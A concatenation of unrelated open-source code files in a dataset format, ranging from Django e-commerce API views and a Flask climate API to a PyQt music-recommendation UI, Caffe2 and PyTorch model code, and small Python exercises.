safe=False)\n return HttpResponse(404)\n\n\nclass WishList(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n data = request.user.product_set.all()\n return JsonResponse(ProductWithOptionSerializer(data, many=True).data, safe=False)\n\n def post(self, request):\n wishlist_products = request.user.product_set\n try:\n product = Product.objects.get(pid=request.GET.get(\"pid\"))\n except:\n return HttpResponse(404)\n if product:\n if product not in wishlist_products.all():\n wishlist_products.add(product)\n return JsonResponse({\"success\": True}, safe=False)\n return HttpResponse(409)\n return HttpResponse(404)\n\n def delete(self, request):\n wishlist_products = request.user.product_set\n try:\n is_exist = wishlist_products.get(pid=request.GET.get('pid'))\n except:\n return HttpResponse(404)\n if is_exist:\n wishlist_products.remove(is_exist)\n 
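# the wishlist entry existed, so removal succeeded\n            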
return JsonResponse({\"success\": True}, safe=False)\n return HttpResponse(404)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef login_with_ph_number(request):\n data = request.data\n user = User.objects.filter(ph_number=data.get('ph_number')).first()\n if (user):\n if user.check_password(data[\"password\"]):\n try:\n if user.is_email_verified and user.is_mobile_verified:\n return Response({\"success\": True, \"token\": user.auth_token.key, \"user\": UserSerializer(user).data})\n else:\n user.last_otp_email = generate__otp()\n user.last_otp_ph_number = generate__otp()\n user.save()\n send_otp(str(user.ph_number), user.last_otp_ph_number)\n send_email(user.email, \"Vimani OTP\", user.last_otp_email)\n return Response({\"success\": False, \"error\": \"Please verify your email and phone number\"})\n except Exception as e:\n print(e)\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,))\ndef change_password(request):\n data = request.data\n user = request.user\n if (user):\n if user.check_password(data[\"old_password\"]):\n user.set_password(data[\"new_password\"])\n user.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\nclass UploadProfilePic(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = request.user\n if user:\n user.profile_pic = request.FILES.get(\"profile_pic\")\n user.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef forget_password(request):\n data = request.data\n user = User.objects.filter(email=data.get('email')).first()\n if (user):\n user.last_otp_email = generate__otp()\n user.save()\n send_email(user.email, \"Vimani OTP\", user.last_otp_email)\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef change_password_forget(request):\n data = request.data\n user = User.objects.filter(email=data.get('email')).first()\n if (user):\n if user.last_otp_email == int(data.get('otp')):\n user.set_password(data[\"new_password\"])\n user.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate you\"})\n\n\nclass GetCoupons(generics.ListAPIView):\n queryset = Coupon.objects.all()\n permission_classes = [IsAuthenticated]\n serializer_class = CouponSerializer\n pagination_class = None\n\nclass GetCouponById(generics.RetrieveAPIView):\n queryset = Coupon.objects.all()\n permission_classes = [IsAuthenticated]\n serializer_class = CouponSerializer\n\n\nclass UpdateProfile(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = request.user\n data= request.data\n if user:\n user_ser = UserSerializer(user, data=data, partial=True)\n if user_ser.is_valid():\n user_ser.save()\n return Response({\"success\": True})\n return Response({\"success\": False, \"error\": user_ser.errors})\n return Response({\"success\": False, \"error\": \"Server unable to authenticate 
you\"})\n","repo_name":"prabhat0206/multivendor_ecom_api_django","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245683937","text":"def get_hash(key: str):\n h = 0\n for char in key:\n h += ord(char)\n return h % 100\n\n\na = [\"kamrul\", \"Hasan\", \"Python\", \"Programmer\"]\n\nfor item in a:\n print(f\"index of {item} is: \", get_hash(item))\n\n\nclass HashTable:\n def __init__(self):\n self.MAX = 100\n self.arr = [None for i in range(self.MAX)]\n\n def get_hash(self, key):\n h = 0\n for char in key:\n h += ord(char)\n return h % self.MAX\n\n def __setitem__(self, key: str, val):\n h = self.get_hash(key)\n self.arr[h] = val\n\n def __getitem__(self, key: str):\n h = self.get_hash(key)\n return self.arr[h]\n\n def __delitem__(self, key: str):\n h = self.get_hash(key)\n self.arr[h] = None\n\n\nht = HashTable()\n# set value by key\nht[\"Kamrul\"] = \"Python\"\nht[\"Hasan\"] = \"Programmer\"\n\nprint(ht[\"Kamrul\"])\nprint(ht[\"Hasan\"])\n\nprint(ht[\"Python\"])\n\n# Delete item\ndel ht[\"Kamrul\"]\n\nprint(ht[\"Kamrul\"])\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/hash_map.py","file_name":"hash_map.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72930689512","text":"#!/usr/bin/env python3\n\nfrom __future__ import annotations\n\nfrom contextlib import ExitStack\n\nimport torch\nfrom transformers.tokenization_utils import PreTrainedTokenizer\n\n\ndef calculate_acc(outputs: list[dict[str, torch.Tensor]], tokenizer: PreTrainedTokenizer,\n reference_file_path: str = '', debug_file_path: str='') -> float:\n if reference_file_path:\n with open(reference_file_path, 'r') as gold_file:\n reference_file_content = gold_file.read().splitlines()\n\n errors = 0\n total = 0\n\n with ExitStack() as stack:\n if debug_file_path:\n debug_file = stack.enter_context(open(debug_file_path, 'w'))\n\n for output_batch in outputs:\n reference_batch = reference_file_content[total:\n ] if reference_file_path else output_batch['decoder_input_ids']\n for pred, ref in zip(output_batch['outputs'], reference_batch):\n total += 1\n pred_tokens = tokenizer.decode(pred, skip_special_tokens=True)\n ref_tokens = ref.rstrip() if reference_file_path else tokenizer.decode(ref, skip_special_tokens=True)\n\n if pred_tokens != ref_tokens:\n errors += 1\n if debug_file_path:\n debug_file.write(f'{pred_tokens} but {ref_tokens}\\n')\n\n return 1 - (errors / total)\n","repo_name":"msc42/seq2seq-transformer","sub_path":"code/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26217312281","text":"# https://leetcode.com/problems/find-the-original-array-of-prefix-xor/\n# medium?\nclass Solution:\n def findArray(self, pref: List[int]) -> List[int]:\n res = [pref[0]]\n n = len(pref)\n for i in range(1, n):\n res.append(pref[i - 1] ^ pref[i])\n\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/2001-2500/2433_find-the-original-array-of-prefix-xor_1_AC.py","file_name":"2433_find-the-original-array-of-prefix-xor_1_AC.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} 
+{"seq_id":"74309690152","text":"\nimport datetime as dt\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nmeasurements = Base.classes.measurement\nstations = Base.classes.station\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Temperature Function\n#################################################\ndef calc_temps(start_date, end_date):\n \"\"\"TMIN, TAVG, and TMAX for a list of dates.\n\n Args:\n start_date (string): A date string in the format %Y-%m-%d\n end_date (string): A date string in the format %Y-%m-%d\n \n Returns:\n TMIN, TAVG, and TMAX\n \"\"\"\n session = Session(engine)\n return session.query(func.min(measurements.tobs), func.avg(measurements.tobs), func.max(measurements.tobs)).\\\n filter(measurements.date >= start_date).filter(measurements.date <= end_date).all()\n \n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\"Available routes:
    \"\n f\"/api/v1.0/precipitation
    \"\n f\"/api/v1.0/stations
    \"\n f\"/api/v1.0/tobs
    \"\n f\"/api/v1.0/start
    \"\n f\"/api/v1.0/start/end\"\n ) \n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef prcp():\n \n \"\"\"Return a list of all precipitation data\"\"\"\n # Query all precipitation data\n session = Session(engine)\n last_twelve_months = dt.date(2017,8,23) - dt.timedelta(days=365)\n\n results = session.query(measurements.date, measurements.prcp).\\\n filter(measurements.date >= last_twelve_months).\\\n order_by(measurements.date).all()\n\n prcp_list = []\n #prcp_list = dict(results)\n for prcp in results:\n prcp_dict = {}\n prcp_dict[\"date\"] = prcp[0]\n prcp_dict[\"prcp\"] = prcp[1]\n \n prcp_list.append(prcp_dict)\n \n session.close()\n return jsonify(prcp_list)\n \n\n@app.route(\"/api/v1.0/stations\")\ndef mystations():\n \n \"\"\"Return a list of all station names\"\"\"\n # Query all station names\n session = Session(engine)\n results = session.query(stations.station,stations.name).all()\n \n station_list = []\n #station_list = dict(results)\n for station in results:\n station_dict = {}\n station_dict[\"station\"] = station[0]\n station_dict[\"name\"] = station[1]\n \n station_list.append(station_dict)\n\n session.close()\n return jsonify(station_list)\n \n\n@app.route(\"/api/v1.0/tobs\")\ndef mytobs():\n\n \"\"\"Return a list of temperature observations (TOBS) for the previous year\"\"\"\n # Query all the dates and temperature observations of the most active station for the last year of data\n session = Session(engine)\n last_twelve_months = dt.date(2017,8,23) - dt.timedelta(days=365)\n \n results = session.query(measurements.date,measurements.tobs).\\\n filter(measurements.date >= last_twelve_months).\\\n filter(measurements.station == \"USC00519281\").\\\n order_by(measurements.date).all()\n \n\n temp_list = []\n #temp_list = dict(results)\n for temp in results:\n temp_dict = {}\n temp_dict[\"date\"] = temp[0]\n temp_dict[\"tobs\"] = temp[1]\n \n temp_list.append(temp_dict)\n\n session.close()\n\n return jsonify(temp_list) \n\n@app.route(\"/api/v1.0/\")\ndef start(start_date):\n\n \"\"\"Return a list of the minimum temperature, the average temperature, and the max temperature for a given start\"\"\"\n # Query all list of the minimum temperature, the average temperature, and the max temperature for a given start.\n session = Session(engine)\n\n results = (calc_temps(start_date,start_date))\n \n \n\n temp_list = []\n #temp_list = dict(results) \n for temp in results:\n temp_dict = {}\n temp_dict[\"min\"] = temp[0]\n temp_dict[\"avg\"] = temp[1]\n temp_dict[\"max\"] = temp[2]\n \n temp_list.append(temp_dict)\n \n session.close()\n return jsonify(temp_list) \n\n@app.route(\"/api/v1.0//\")\ndef start_end(start,end):\n\n \"\"\"Return a list of the minimum temperature, the average temperature, and the max temperature for a given start and start-end range\"\"\"\n # Query all list of the minimum temperature, the average temperature, and the max temperature for a given start and start-end range.\n session = Session(engine)\n results = (calc_temps(start,end))\n \n temp_list = []\n #temp_list = dict(results)\n for temp in results:\n temp_dict = {}\n temp_dict[\"min\"] = temp[0]\n temp_dict[\"avg\"] = temp[1]\n temp_dict[\"max\"] = temp[2]\n \n temp_list.append(temp_dict)\n \n session.close()\n return jsonify(temp_list) \n\nif __name__ == '__main__':\n 
app.run(debug=True)\n","repo_name":"eddyannobil/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"518303037","text":"# *******************************************************************************\r\n# * Copyright (c) 2011 Wind River Systems, Inc. and others.\r\n# * All rights reserved. This program and the accompanying materials\r\n# * are made available under the terms of the Eclipse Public License v1.0\r\n# * which accompanies this distribution, and is available at\r\n# * http://www.eclipse.org/legal/epl-v10.html\r\n# *\r\n# * Contributors:\r\n# * Wind River Systems - initial API and implementation\r\n# *******************************************************************************\r\n\r\nfrom tcf.services import linenumbers\r\nfrom tcf.channel.Command import Command\r\n\r\nclass LineNumbersProxy(linenumbers.LineNumbersService):\r\n\r\n def __init__(self, channel):\r\n self.channel = channel\r\n\r\n def mapToSource(self, context_id, start_address, end_address, done):\r\n done = self._makeCallback(done)\r\n service = self\r\n class MapCommand(Command):\r\n def __init__(self):\r\n super(MapCommand, self).__init__(service.channel, service,\r\n \"mapToSource\", (context_id, start_address, end_address))\r\n def done(self, error, args):\r\n arr = None\r\n if not error:\r\n assert len(args) == 2\r\n error = self.toError(args[0])\r\n arr = _toCodeAreaArray(args[1])\r\n done.doneMapToSource(self.token, error, arr)\r\n return MapCommand().token\r\n\r\n def mapToMemory(self, context_id, file, line, column, done):\r\n done = self._makeCallback(done)\r\n service = self\r\n class MapCommand(Command):\r\n def __init__(self):\r\n super(MapCommand, self).__init__(service.channel, service,\r\n \"mapToMemory\", (context_id, file, line, column))\r\n def done(self, error, args):\r\n arr = None\r\n if not error:\r\n assert len(args) == 2\r\n error = self.toError(args[0])\r\n arr = _toCodeAreaArray(args[1])\r\n done.doneMapToMemory(self.token, error, arr)\r\n return MapCommand().token\r\n\r\ndef _toCodeAreaArray(o):\r\n if not o: return None\r\n arr = []\r\n directory = None\r\n file = None\r\n for area in o:\r\n directory = area.get(\"Dir\", directory)\r\n file = area.get(\"File\", file)\r\n arr.append(linenumbers.CodeArea(directory, file,\r\n area.get(\"SLine\", 0), area.get(\"SCol\", 0),\r\n area.get(\"ELine\", 0), area.get(\"ECol\", 0),\r\n area.get(\"SAddr\"), area.get(\"EAddr\"),\r\n area.get(\"ISA\", 0),\r\n area.get(\"IsStmt\"), area.get(\"BasicBlock\"),\r\n area.get(\"PrologueEnd\"), area.get(\"EpilogueBegin\")))\r\n return arr\r\n","repo_name":"eswartz/emul","sub_path":"org.eclipse.tcf/python/src/tcf/services/remote/LineNumbersProxy.py","file_name":"LineNumbersProxy.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"4436823353","text":"lista = list()\r\no = 's'\r\nwhile o in 'sS':\r\n lista.append(int(input('Digite um número')))\r\n o = str(input('Quer continuar? 
[S/N] '))\r\nprint(f'Você digitou {len(lista)} números')\r\nlista.sort(reverse=True)\r\nprint(f\"Em ordem decrescente são: {lista}\")\r\nif 5 in lista:\r\n    print('O valor 5 foi digitado!')\r\nelse:\r\n    print('O valor 5 não foi digitado')\r\n\r\n","repo_name":"igortuag/DesafiosCursoEmVideo","sub_path":"ex081.py","file_name":"ex081.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15656019706","text":"def range(*args):\n    # List-based stand-in for the builtin range (which it shadows)\n    if len(args) == 1:\n        start = 0\n        stop = args[0]\n        step = 1\n    elif len(args) == 2:\n        start, stop = args\n        step = 1\n    elif len(args) == 3:\n        start, stop, step = args\n    else:\n        raise TypeError('range expected 1 to 3 arguments, got %d' % len(args))\n    l = []\n    i = start\n    while i < stop:\n        l.append(i)\n        i += step\n    return l\n\ndef myFunction(**kwargs):\n    print(kwargs)","repo_name":"rayzchen/Python-tutorials","sub_path":"tutorial7.py","file_name":"tutorial7.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38782805217","text":"from PyQt5.QtWidgets import QMainWindow, QApplication, QPlainTextEdit, QPushButton, QLabel, QWidget\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QPixmap\nimport sys\nfrom PIL import Image, ImageEnhance\nimport logic.inputanalysis\n\nclass SongRecommendWindow(QMainWindow):\n    def __init__(self):\n        super().__init__()\n\n        uic.loadUi(\"recompage.ui\", self) # recommendations window\n\n        trackname = logic.inputanalysis.tracknamee\n\n        self.img1 = self.findChild(QLabel, \"img1\")\n        self.txt1 = self.findChild(QLabel, \"text_1\")\n        self.img2 = self.findChild(QLabel, \"img1_2\")\n        self.txt2 = self.findChild(QLabel, \"text_2\")\n        self.img3 = self.findChild(QLabel, \"img1_3\")\n        self.txt3 = self.findChild(QLabel, \"text_3\")\n        self.img4 = self.findChild(QLabel, \"img1_4\")\n        self.txt4 = self.findChild(QLabel, \"text_4\")\n        self.img5 = self.findChild(QLabel, \"img1_5\")\n        self.txt5 = self.findChild(QLabel, \"text_5\")\n        self.img6 = self.findChild(QLabel, \"img1_6\")\n        self.txt6 = self.findChild(QLabel, \"text_6\")\n\n        # Darken each cover image so the labels stay readable (note: enhance()\n        # rewrites the file in place, so every run darkens the covers further)\n        for i in range(1, 7):\n            path = f'rec{i}.jpg'\n            im = Image.open(path)\n            enhancer = ImageEnhance.Brightness(im)\n            enhancer.enhance(0.5).save(path)\n\n        pixmap = QPixmap('rec1.jpg')\n        self.img1.setPixmap(pixmap)\n        self.img1.setScaledContents(True)\n        self.txt1.setText(trackname[0])\n\n        pixmap = QPixmap('rec2.jpg')\n        self.img2.setPixmap(pixmap)\n        self.img2.setScaledContents(True)\n        self.txt2.setText(trackname[1])\n\n        pixmap = QPixmap('rec3.jpg')\n        self.img3.setPixmap(pixmap)\n        self.img3.setScaledContents(True)\n        self.txt3.setText(trackname[2])\n\n        pixmap = QPixmap('rec4.jpg')\n        self.img4.setPixmap(pixmap)\n        self.img4.setScaledContents(True)\n        self.txt4.setText(trackname[3])\n\n        pixmap = QPixmap('rec5.jpg')\n        self.img5.setPixmap(pixmap)\n        
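Two records up, tutorial7.py re-implements `range` as a plain list-returning function. Since it shadows the builtin, its behaviour is easy to pin down with a few checks; the snippet below is an editor's illustration that assumes the tutorial's `range` is in scope, and is not part of either repository:

```python
# Assumes tutorial7.py's list-based range() is defined in this module;
# unlike the builtin, it materialises a full list up front.
assert range(5) == [0, 1, 2, 3, 4]            # stop only
assert range(2, 8) == [2, 3, 4, 5, 6, 7]      # start, stop
assert range(1, 10, 3) == [1, 4, 7]           # start, stop, step
assert range(10, 0, -1) == []                 # builtin counts down here; the
                                              # `while i < stop` loop cannot
```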
self.img5.setScaledContents(True)\n self.txt5.setText(trackname[4])\n\n pixmap = QPixmap('rec6.jpg')\n self.img6.setPixmap(pixmap)\n self.img6.setScaledContents(True)\n self.txt6.setText(trackname[5])\n self.show()\n\n\nclass SongInputWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n \n uic.loadUi(\"inputwindow.ui\", self) #second window time\n \n self.textbox = self.findChild(QPlainTextEdit, \"textbox\")\n self.submitbutton = self.findChild(QPushButton, \"submit\")\n self.taxt = self.findChild(QLabel, \"label\")\n self.submitbutton.clicked.connect(self.clicker2)\n self.show()\n \n def clicker2(self, clicked):\n logic.inputanalysis.saving_input(self)\n SongInputWindow.hide(self) #moving to 3rd window\n self.w = SongRecommendWindow()\n self.w.show()\n \n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super(MainWindow, self).__init__()\n\n #loading the UI file\n uic.loadUi(\"findtuneui.ui\", self)\n\n #defining the widgets\n self.gsbutton = self.findChild(QPushButton, \"Getstart_button\")\n\n #actions\n self.gsbutton.clicked.connect(self.clicker)\n\n #showing the app\n self.show()\n \n def clicker(self, checked): \n MainWindow.hide(self)\n self.w = SongInputWindow()\n self.w.show()\n\ndef mainApp():\n app = QApplication(sys.argv) #initialize the app\n w = MainWindow()\n w.setWindowTitle(\"FindTune\")\n w.show()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n mainApp()\n","repo_name":"pranav-avn/FindTune-R","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14815957099","text":"\n\n\n\n\nfrom caffe2.python import core, schema\nfrom caffe2.python.modeling.net_modifier import NetModifier\n\nimport numpy as np\n\n\nclass ComputeStatisticsForBlobs(NetModifier):\n \"\"\"\n This class modifies the net passed in by adding ops to compute statistics\n for certain blobs. 
For each blob in the list, its min, max, mean and standard\n deviation will be computed.\n\n Args:\n blobs: list of blobs to compute norm for\n logging_frequency: frequency for printing norms to logs\n \"\"\"\n\n def __init__(self, blobs, logging_frequency):\n self._blobs = blobs\n self._logging_frequency = logging_frequency\n self._field_name_suffix = '_summary'\n\n def modify_net(self, net, init_net=None, grad_map=None, blob_to_device=None,\n modify_output_record=False):\n\n for blob_name in self._blobs:\n blob = core.BlobReference(blob_name)\n assert net.BlobIsDefined(blob), 'blob {} is not defined in net {} whose proto is {}'.format(blob, net.Name(), net.Proto())\n\n cast_blob = net.Cast(blob, to=core.DataType.FLOAT)\n stats_name = net.NextScopedBlob(prefix=blob + self._field_name_suffix)\n stats = net.Summarize(cast_blob, stats_name, to_file=0)\n net.Print(stats, [], every_n=self._logging_frequency)\n\n if modify_output_record:\n output_field_name = str(blob) + self._field_name_suffix\n output_scalar = schema.Scalar((np.float64, (1,)), stats)\n\n if net.output_record() is None:\n net.set_output_record(\n schema.Struct((output_field_name, output_scalar))\n )\n else:\n net.AppendOutputRecordField(\n output_field_name,\n output_scalar)\n\n def field_name_suffix(self):\n return self._field_name_suffix\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/modeling/compute_statistics_for_blobs.py","file_name":"compute_statistics_for_blobs.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"12538395878","text":"class Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n def swap(array, i, j):\n array[i], array[j] = array[j], array[i]\n \n def reverse(array, start):\n \"\"\" reverse the postfix subarray starting from 'start' \"\"\"\n end = len(array) - 1\n while start < end:\n array[start], array[end] = array[end], array[start]\n start += 1\n end -= 1\n \n # locate the pair of elements to switch\n i = len(nums) - 2\n while i >= 0:\n if nums[i] < nums[i+1]:\n break\n i -= 1\n \n if i >= 0:\n j = len(nums) - 1\n while j > 0:\n if nums[j] > nums[i]:\n break\n j -= 1\n \n swap(nums, i, j)\n \n # reverse the postfix in order to obtain the minimal permutation\n reverse(nums, i+1)\n","repo_name":"liaison/LeetCode","sub_path":"python/31_next_permutation.py","file_name":"31_next_permutation.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"25239298216","text":"import pymesh\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.utils.data\nimport numpy as np\nfrom torch.autograd import Variable\n\n\nclass SquareTemplate():\n def __init__(self, device=0):\n self.device = device\n self.dim = 2\n self.npoints = 0\n\n def get_random_points(self, shape, device=\"gpu0\"):\n \"\"\"\n Get random points on a Sphere\n Return Tensor of Size [x, 2, x ... 
x]\n \"\"\"\n rand_grid = torch.cuda.FloatTensor(shape).to(device).float()\n rand_grid.data.uniform_(0, 1)\n return Variable(rand_grid)\n\n def get_regular_points(self, npoints=2500, device=\"gpu0\"):\n \"\"\"\n Get regular points on a Square\n Return Tensor of Size [x, 3]\n \"\"\"\n if not self.npoints == npoints:\n self.npoints = npoints\n vertices, faces = self.generate_square(np.sqrt(npoints))\n self.mesh = pymesh.form_mesh(vertices=vertices, faces=faces) # 10k vertices\n self.vertex = torch.from_numpy(self.mesh.vertices).to(device).float()\n self.num_vertex = self.vertex.size(0)\n self.vertex = self.vertex.transpose(0,1).contiguous().unsqueeze(0)\n\n return Variable(self.vertex[:, :2].contiguous().to(device))\n\n @staticmethod\n def generate_square(grain):\n \"\"\"\n Generate a square mesh from a regular grid.\n :param grain:\n :return:\n \"\"\"\n grain = int(grain)\n grain = grain - 1 # to return grain*grain points\n # generate regular grid\n faces = []\n vertices = []\n for i in range(0, int(grain + 1)):\n for j in range(0, int(grain + 1)):\n vertices.append([i / grain, j / grain, 0])\n\n for i in range(1, int(grain + 1)):\n for j in range(0, (int(grain + 1) - 1)):\n faces.append([j + (grain + 1) * i,\n j + (grain + 1) * i + 1,\n j + (grain + 1) * (i - 1)])\n for i in range(0, (int((grain + 1)) - 1)):\n for j in range(1, int((grain + 1))):\n faces.append([j + (grain + 1) * i,\n j + (grain + 1) * i - 1,\n j + (grain + 1) * (i + 1)])\n\n return np.array(vertices), np.array(faces)\n\ndef get_num_ada_norm_params(model):\n # return the number of AdaNorm parameters needed by the model\n num_ada_norm_params = 0\n for m in model.modules():\n if m.__class__.__name__ == \"AdaptiveBatchNorm1d\" or m.__class__.__name__ == \"AdaptiveInstanceNorm\":\n num_ada_norm_params += 2 * m.norm.num_features\n return num_ada_norm_params\n\nclass AdaptiveBatchNorm1d(nn.Module):\n def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True):\n super(AdaptiveBatchNorm1d, self).__init__()\n self.norm = nn.BatchNorm1d(num_features, eps, momentum, affine)\n\n def forward(self, x, params):\n \n a = params[:, :params.size(1) // 2].unsqueeze(2)\n b = params[:, params.size(1) // 2:].unsqueeze(2)\n print(x.shape)\n print(a.shape)\n print(b.shape)\n return a*x + b * self.norm(x) # TODO(msegu): ouch, why a * x and not just a? Must be a bug\n\nclass Mapping2Dto3D(nn.Module):\n \"\"\"\n Core Atlasnet Function.\n Takes batched points as input and run them through an MLP.\n Note : the MLP is implemented as a torch.nn.Conv1d with kernels of size 1 for speed.\n Note : The latent vector is added as a bias after the first layer. 
Note that this is strictly identical\n as concatenating each input point with the latent vector but saves memory and speeed.\n Author : Thibault Groueix 01.11.2019\n \"\"\"\n\n def __init__(self):\n self.style_bottleneck_size = 512\n self.bottleneck_size = 1024\n self.input_size = 2 #for square\n self.dim_output = 3\n self.hidden_neurons = 512\n self.num_layers = 2\n self.num_layers_style = 1\n # self.activation = nn.ReLU()\n self.decode_style = True\n\n super(Mapping2Dto3D, self).__init__()\n self.activation = nn.ReLU()\n\n print(\n f\"New MLP decoder : hidden size {self.hidden_neurons}, num_layers {self.num_layers}, \"\n f\"num_layers_style {self.num_layers_style}, activation {self.activation}\")\n \n self.conv1 = torch.nn.Conv1d(self.input_size, self.bottleneck_size, 1)\n self.conv2 = torch.nn.Conv1d(self.bottleneck_size, self.hidden_neurons, 1)\n self.conv_list = nn.ModuleList(\n [torch.nn.Conv1d(self.hidden_neurons, self.hidden_neurons, 1) for i in range(self.num_layers)])\n self.conv_list_style = nn.ModuleList(\n [torch.nn.Conv1d(self.hidden_neurons, self.hidden_neurons, 1) for i in range(self.num_layers_style)])\n self.last_conv = torch.nn.Conv1d(self.hidden_neurons, self.dim_output, 1)\n\n norm = torch.nn.BatchNorm1d \n self.bn1 = norm(self.bottleneck_size)\n self.bn2 = norm(self.hidden_neurons)\n self.bn_list = nn.ModuleList([norm(self.hidden_neurons) for i in range(self.num_layers)])\n self.bn_list_style = nn.ModuleList(\n [norm(self.hidden_neurons) for i in range(self.num_layers_style)])\n\n\n def forward(self, x, content, style):\n x = self.conv1(x) + content\n x = self.activation(self.bn1(x))\n x = self.activation(self.bn2(self.conv2(x)))\n for i in range(self.num_layers):\n x = self.activation(self.bn_list[i](self.conv_list[i](x)))\n\n if self.decode_style:\n x = x + style\n for i in range(self.num_layers_style):\n x = self.activation(self.bn_list_style[i](self.conv_list_style[i](x)))\n return self.last_conv(x)\n\n\n\nclass AdaptiveMapping2Dto3D(nn.Module):\n \"\"\"\n Core Atlasnet Function.\n Takes batched points as input and run them through an MLP.\n Note : the MLP is implemented as a torch.nn.Conv1d with kernels of size 1 for speed.\n Note : The latent vector is added as a bias after the first layer. 
Note that this is strictly identical\n as concatenating each input point with the latent vector but saves memory and speeed.\n Author : Thibault Groueix 01.11.2019\n \"\"\"\n\n def __init__(self):\n self.bottleneck_size = 1024\n self.input_size = 2 #for square\n self.dim_output = 3\n self.hidden_neurons = 512\n self.num_layers = 2\n self.num_layers_style = 1\n # self.activation = nn.ReLU()\n self.decode_style = True\n\n super(AdaptiveMapping2Dto3D, self).__init__()\n\n self.activation = nn.ReLU()\n print(\n f\"New MLP decoder : hidden size {self.hidden_neurons}, num_layers {self.num_layers}, \"\n f\"activation {self.activation}\")\n\n self.conv1 = torch.nn.Conv1d(self.input_size, self.bottleneck_size, 1)\n self.conv2 = torch.nn.Conv1d(self.bottleneck_size, self.hidden_neurons, 1)\n\n self.conv_list = nn.ModuleList(\n [torch.nn.Conv1d(self.hidden_neurons, self.hidden_neurons, 1) for i in range(self.num_layers)])\n\n self.last_conv = torch.nn.Conv1d(self.hidden_neurons, self.dim_output, 1)\n\n self.bn1 = AdaptiveBatchNorm1d(self.bottleneck_size)\n self.bn2 = AdaptiveBatchNorm1d(self.hidden_neurons)\n\n self.bn_list = nn.ModuleList([AdaptiveBatchNorm1d(self.hidden_neurons) for i in range(self.num_layers)])\n\n \n\n def forward(self, x, content, adabn_params):\n x = self.conv1(x) + content\n x = self.activation(self.bn1(x, adabn_params[:, 0:self.bottleneck_size * 2]))\n x = self.activation(self.bn2(\n self.conv2(x), adabn_params[:,\n self.bottleneck_size * 2:\n self.bottleneck_size * 2 + self.hidden_neurons * 2]))\n for i in range(self.num_layers):\n x = self.activation(self.bn_list[i](\n self.conv_list[i](x),\n adabn_params[:,\n self.bottleneck_size * 2 + (1 + i) * self.hidden_neurons * 2:\n self.bottleneck_size * 2 + (2 + i) * self.hidden_neurons * 2]))\n\n return self.last_conv(x)\n\nclass StyleAtlasnet(nn.Module):\n\n def __init__(self, number_points, nb_primitives):\n \"\"\"\n Core Atlasnet module : decoder to meshes and pointclouds.\n This network takes an embedding in the form of a latent vector and returns a pointcloud or a mesh\n :param opt: \n \"\"\"\n super(StyleAtlasnet, self).__init__()\n self.device = 'cuda:0' if 